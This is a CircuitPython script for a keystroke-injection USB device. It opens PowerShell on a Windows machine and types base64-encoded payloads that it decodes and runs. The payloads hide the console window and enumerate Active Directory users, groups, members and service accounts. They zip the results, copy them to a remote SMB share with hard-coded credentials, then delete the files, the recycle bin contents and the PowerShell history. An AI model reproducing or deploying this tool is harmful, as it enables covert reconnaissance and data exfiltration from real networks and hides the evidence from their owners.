
import usb_hid
from adafruit_hid.keyboard import Keyboard
from adafruit_hid.keyboard_layout_us import KeyboardLayoutUS
from adafruit_hid.keycode import Keycode
from time import sleep

# Insert Encoded Payloads here (encases in quotes)
# Make sure you change smb share info before encoding. 

payloads=[
    "QWRkLVR5cGUgLU5hbWUgV2luZG93IC1OYW1lc3BhY2UgQ29uc29sZSAtTWVtYmVyRGVmaW5pdGlvbiAnCltEbGxJbXBvcnQoIktlcm5lbDMyLmRsbCIpXSAKcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIEdldENvbnNvbGVXaW5kb3coKTsKW0RsbEltcG9ydCgidXNlcjMyLmRsbCIpXQpwdWJsaWMgc3RhdGljIGV4dGVybiBib29sIE1vdmVXaW5kb3coSW50UHRyIGhXbmQsIGludCBYLCBpbnQgWSwgaW50IFcsIGludCBIKTsgJwokY29uc29sZUhXTkQgPSBbQ29uc29sZS5XaW5kb3ddOjpHZXRDb25zb2xlV2luZG93KCk7CiRjb25zb2xlSFdORCA9IFtDb25zb2xlLldpbmRvd106Ok1vdmVXaW5kb3coJGNvbnNvbGVIV05ELCAwLCAwLCAwLCAwKTsKJHBzaG9zdCA9IGdldC1ob3N0CiRwc3dpbmRvdyA9ICRwc2hvc3QudWkucmF3dWkKJG5ld3NpemUgPSAkcHN3aW5kb3cuYnVmZmVyc2l6ZQokbmV3c2l6ZS5oZWlnaHQgPSAyMDAwCiRuZXdzaXplLndpZHRoID0gMjAwCiRwc3dpbmRvdy5idWZmZXJzaXplID0gJG5ld3NpemUKJG5ld3NpemUgPSAkcHN3aW5kb3cud2luZG93c2l6ZQokbmV3c2l6ZS5oZWlnaHQgPSAxCiRuZXdzaXplLndpZHRoID0gMQokcHN3aW5kb3cud2luZG93c2l6ZSA9ICRuZXdzaXpl",
    "JGggPSAiMTkyLjE2OC4wLjEwIgokdSA9ICJkZXYiCiRwID0gImRldiIKJHNoYXJlID0gInRtcCI=",
    "JGRpciA9ICIkSE9NRVxEZXNrdG9wXGxvZ3MiCm1rZGlyICRkaXIKJGxvZzEgPSAiJGRpclxsb2cxLnR4dCIKJGxvZzIgPSAiJGRpclxsb2cyLnR4dCIKJGxvZzMgPSAiJGRpclxsb2czLnR4dCIKJGxvZzQgPSAiJGRpclxsb2c0LnR4dCIKJGxvZzUgPSAiJGRpclxsb2c1LnR4dCIKW1N5c3RlbS5EaXJlY3RvcnlTZXJ2aWNlcy5BY3RpdmVEaXJlY3RvcnkuRG9tYWluXTo6R2V0Q3VycmVudERvbWFpbigpID4+ICRsb2cxCiRkb21haW5PYmogPSBbU3lzdGVtLkRpcmVjdG9yeVNlcnZpY2VzLkFjdGl2ZURpcmVjdG9yeS5Eb21haW5dOjpHZXRDdXJyZW50RG9tYWluKCkKJFBEQyA9ICgkZG9tYWluT2JqLlBkY1JvbGVPd25lcikuTmFtZQokU2VhcmNoU3RyaW5nID0gIkxEQVA6Ly8iCiRTZWFyY2hTdHJpbmcgKz0gJFBEQyArICIvIgokRGlzdGluZ3Vpc2hlZE5hbWUgPSAiREM9JCgkZG9tYWluT2JqLk5hbWUuUmVwbGFjZSgnLicsICcsREM9JykpIgokU2VhcmNoU3RyaW5nICs9ICREaXN0aW5ndWlzaGVkTmFtZQokU2VhcmNoZXIgPSBOZXctT2JqZWN0IFN5c3RlbS5EaXJlY3RvcnlTZXJ2aWNlcy5EaXJlY3RvcnlTZWFyY2hlcihbQURTSV0kU2VhcmNoU3RyaW5nKQokb2JqRG9tYWluID0gTmV3LU9iamVjdCBTeXN0ZW0uRGlyZWN0b3J5U2VydmljZXMuRGlyZWN0b3J5RW50cnkKJFNlYXJjaGVyLlNlYXJjaFJvb3QgPSAkb2JqRG9tYWluCiRTZWFyY2hlci5maWx0ZXI9InNhbUFjY291bnRUeXBlPTgwNTMwNjM2OCIKJFNlYXJjaGVyLkZpbmRBbGwoKSA+PiAkbG9nMgokUmVzdWx0ID0gJFNlYXJjaGVyLkZpbmRBbGwoKQpGb3JlYWNoKCRvYmogaW4gJFJlc3VsdCkKewpGb3JlYWNoKCRwcm9wIGluICRvYmouUHJvcGVydGllcykKewplY2hvICItLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tIiA+PiAkbG9nMgokcHJvcCA+PiAkbG9nMgp9Cn0KJFNlYXJjaGVyLmZpbHRlcj0iKG9iamVjdENsYXNzPUdyb3VwKSIKJFJlc3VsdCA9ICRTZWFyY2hlci5GaW5kQWxsKCkKRm9yZWFjaCgkb2JqIGluICRSZXN1bHQpCnsKJG9iai5Qcm9wZXJ0aWVzLm5hbWUgPj4gJGxvZzMKfQpmb3JlYWNoKCRsaW5lIGluIFtTeXN0ZW0uSU8uRmlsZV06OlJlYWRMaW5lcygkbG9nMykpCnsKJGdyb3VwbmFtZSA9ICRsaW5lCiRTZWFyY2hlci5maWx0ZXI9IihuYW1lPSRncm91cG5hbWUpIgokUmVzdWx0ID0gJFNlYXJjaGVyLkZpbmRBbGwoKQpGb3JlYWNoKCRvYmogaW4gJFJlc3VsdCkKewokb2JqLlByb3BlcnRpZXMubWVtYmVyID4+ICRsb2c0Cn0KfQokc3BucyA9IEAoImh0dHAiLCAiU1FMIiwgInNxbCIsICJzbWIiKQpGb3JFYWNoICgkc3BuIGluICRzcG5zKSB7CiAgICAkc2VydmljZW5hbWUgPSAiaHR0cCIKICAgICRTZWFyY2hlci5maWx0ZXI9InNlcnZpY2VwcmluY2lwYWxuYW1lPSokc2VydmljZW5hbWUqIgogICAgJFJlc3VsdCA9ICRTZWFyY2hlci5GaW5kQWxsKCkKICAgIEZvcmVhY2goJG9iaiBpbiAkUmVzdWx0KQogICAgewogICAgRm9yZWFjaCgkcHJvcCBpbiAkb2JqLlByb3BlcnRpZXMpCiAgICB7CiAgICAkcHJvcCA+PiAkbG9nNQogICAgfQogICAgfQp9CkNvbXByZXNzLUFyY2hpdmUgLUxpdGVyYWxQYXRoICRkaXIgLURlc3RpbmF0aW9uUGF0aCAkZGlyXGxvZ3MuemlwCk5ldy1TbWJNYXBwaW5nIC1Mb2NhbFBhdGggIlQ6IiAtUmVtb3RlUGF0aCAiXFwkaFwkc2hhcmUiIC1Vc2VybmFtZSAiJHUiIC1QYXNzd29yZCAiJHAiCm1vdmUtaXRlbSAtcGF0aCAkZGlyXGxvZ3MuemlwIC1EZXN0aW5hdGlvbiAiXFwkaFwkc2hhcmUi",
    "UmVtb3ZlLUl0ZW0gJGRpciAtUmVjdXJzZQpDbGVhci1SZWN5Y2xlQmluIC1Gb3JjZQpSZW1vdmUtU21iTWFwcGluZyAtUmVtb3RlUGF0aCAiXFwkaFwkc2hhcmUiIC1Gb3JjZQpSZW1vdmUtVmFyaWFibGUgKiAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQpSZW1vdmUtSXRlbSAoR2V0LVBTUmVhZGxpbmVPcHRpb24pLkhpc3RvcnlTYXZlUGF0aApleGl0"    
]

# Setup Keyboard

kbd = Keyboard(usb_hid.devices)
layout = KeyboardLayoutUS(kbd)
sleep(6)

# Spawn Powershell

kbd.press(Keycode.WINDOWS)
sleep(.09)
kbd.press(Keycode.R)
sleep(.09)
kbd.release(Keycode.WINDOWS)
sleep(.09)
kbd.release(Keycode.R)
sleep(1)	
layout.write("powershell")
kbd.press(Keycode.ENTER)
sleep(.09)
kbd.release(Keycode.ENTER)
sleep(2)

# Decode Payloads

prefix = "$a = \""
suffix = '''\"
$b = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($a))
iex $b
Remove-Variable a
Remove-Variable b
'''

# Execute Payloads

for enc_pay in payloads:
	layout.write(prefix+enc_pay+suffix)
